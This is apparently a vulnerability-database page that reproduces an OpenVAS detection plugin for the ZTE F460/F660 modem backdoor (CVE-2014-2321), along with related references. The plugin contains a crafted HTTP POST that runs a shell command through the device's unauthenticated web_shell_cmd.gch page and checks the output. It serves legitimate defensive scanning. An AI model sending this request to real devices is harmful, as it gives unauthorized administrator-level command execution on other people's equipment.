ZTE F460/F660 Backdoor Unauthorized Access Vulnerability (Mar 2014) - Active Check
🗓️ 20 Mar 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType
openvas🔗 plugins.openvas.org👁 2519 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2014-2321 | 11 Mar 201400:00 | – | attackerkb | |
| CVE-2014-2321 | 24 Oct 202400:00 | – | circl | |
| ZTE F460/F660 Backdoor Unauthorized Access (CVE-2014-2321) | 17 Apr 201600:00 | – | checkpoint_advisories | |
| CVE-2014-2321 | 11 Mar 201410:00 | – | cve | |
| CVE-2014-2321 | 11 Mar 201410:00 | – | cvelist | |
| Windows-ZTE-Loader | 8 Sep 202619:15 | – | kitploit | |
| How to proactively defend against Mozi IoT botnet | 19 Aug 202118:00 | – | mmpc | |
| How to proactively defend against Mozi IoT botnet | 19 Aug 202118:00 | – | mssecure | |
| Event tracking: ZTE router SOHO Router)Backdoor has been clear-vulnerability warning-the black bar safety net | 14 Apr 201500:00 | – | myhack58 | |
| ZTE Cable Modem Web Shell | 7 Sep 202606:34 | – | nuclei |
10
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103924");
script_version("2025-09-11T05:38:37+0000");
script_tag(name:"last_modification", value:"2025-09-11 05:38:37 +0000 (Thu, 11 Sep 2025)");
script_tag(name:"creation_date", value:"2014-03-20 09:52:23 +0100 (Thu, 20 Mar 2014)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2014-2321");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
script_name("ZTE F460/F660 Backdoor Unauthorized Access Vulnerability (Mar 2014) - Active Check");
# nb: Access to the web shell or calling ifconfig might be already seen as an attack...
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2014 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_get_http_banner.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("Mini_web_server/banner");
script_tag(name:"summary", value:"ZTE F460/F660 cable modem devices are prone to an unauthorized
access vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP POST request and checks the response.");
script_tag(name:"insight", value:"web_shell_cmd.gch on ZTE F460 and F660 cable modems allows
remote attackers to obtain administrative access via sendcmd requests.");
script_tag(name:"impact", value:"Attackers can exploit this issue to execute arbitrary commands
with administrator level access on the affected device. This may aid in further attacks.");
script_tag(name:"affected", value:"ZTE F460/F660 cabel modem devices are known to be affected.
Other models or vendors might be affected as well.");
script_tag(name:"solution", value:"Ask the Vendor for an update.");
script_xref(name:"URL", value:"https://web.archive.org/web/20210120123923/http://www.securityfocus.com/bid/65962");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
port = http_get_port( default:80 );
banner = http_get_remote_headers( port:port );
if( ! banner || banner !~ "Server\\s*:\\s*Mini web server" )
exit( 0 );
if( http_vuln_check( port:port, url:"/web_shell_cmd.gch", pattern:"please input shell command" ) ) {
useragent = http_get_user_agent();
host = http_host_name( port:port );
req = 'POST /web_shell_cmd.gch HTTP/1.1\r\n' +
'Host: ' + host + '\r\n' +
'User-Agent: ' + useragent + '\r\n' +
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n' +
'Accept-Encoding: identify\r\n' +
'Referer: http://' + host + '/web_shell_cmd.gch\r\n' +
'Connection: Close\r\n' +
'Content-Type: application/x-www-form-urlencoded\r\n' +
'Content-Length: 98\r\n' +
'\r\n' +
'IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=%2Fsbin%2Fifconfig&CmdAck=';
res = http_send_recv( port:port, data:req );
if( "Link encap" >< res && "HWaddr" >< res && "BROADCAST" >< res ) {
report = "It was possible to execution the 'ifconfig' command." +
'\n\nResult:\n\n' + chomp( res );
security_message( port:port, data:report );
exit( 0 );
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 210
EPSS0.59259